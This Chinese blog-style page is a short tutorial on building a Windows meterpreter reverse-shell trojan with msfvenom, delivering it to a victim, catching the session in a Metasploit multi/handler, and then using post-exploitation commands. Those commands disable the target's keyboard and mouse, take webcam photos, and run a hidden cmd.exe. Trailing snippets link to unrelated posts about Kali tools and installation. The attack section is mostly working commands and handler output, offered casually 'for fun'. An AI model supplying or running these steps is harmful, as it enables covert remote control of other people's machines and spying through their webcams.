通過msfvenom生成木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=自己位址 lport=埠號 -f exe x>xx.exe
把木馬傳過去,點開就會往自己開放的ip和埠傳送乙個tcp鏈結
在kali中
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.4.3 #設定本地ip
lhost => 172.16.4.3
msf exploit(multi/handler) > set lport 44444 #設定本地埠
lport => 44444
msf exploit(multi/handler) > exploit
[*] started reverse tcp handler on 172.16.4.3:44444
tcp鏈結以後可以使用以下功能
uictl開關鍵盤/滑鼠
uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠
uictl disable mouse #禁用滑鼠
uictl disable keyboard #禁用鍵盤
webcam攝像頭命令
webcam_list #檢視攝像頭
webcam_snap #通過攝像頭拍照
execute執行檔案
execute #在目標機中執行檔案
execute -h -i -f cmd.exe # 建立新程序cmd.exe,-h不可見,-i互動
只列出一部分詳細參見下面鏈結
咳咳。。。。玩玩就好
Kali滲透測試 EtherApe
在對網路資料分析的時候,滲透測試人員往往只關心資料流向以及協議型別,而不關心具體資料報的內容。因為這樣可以快速找到網路的關鍵節點或者重要的協議型別。kali linux提供的etherape可以滿足這個需求。該工具需要使用者使用命令apt get install etherape手動安裝。它支援匯入...
在win10下安裝kali系統小記
對滲透有一點點小的好奇,於是打算安裝了kali linux系統試試。因為本身是雙系統,win10 ubuntu 其實是偽三系統,還有個win7 所以想著跟之前裝ubuntu沒什麼區別。但是問題卻頻頻出現,我的系統是legacy啟動方式,如果有相同的朋友可以參考一下。我安裝的是kali 2016.2版...
win10 安裝 kali 雙系統 遇到的問題
參考 1本人主機 雷神 黑幽靈m506 2主機有 1個 1tb的機械 和乙個固態,記憶體8g,我在 機械裡面 劃了300個g出來 不會操作的話 建議使用軟體,簡單 開機按f11 前面準備的東西都差不多,但遇到了 如下 問題 和 解決方法 軟碟通 ultraiso 製作啟動盤時,在讀取時發生錯誤 解決...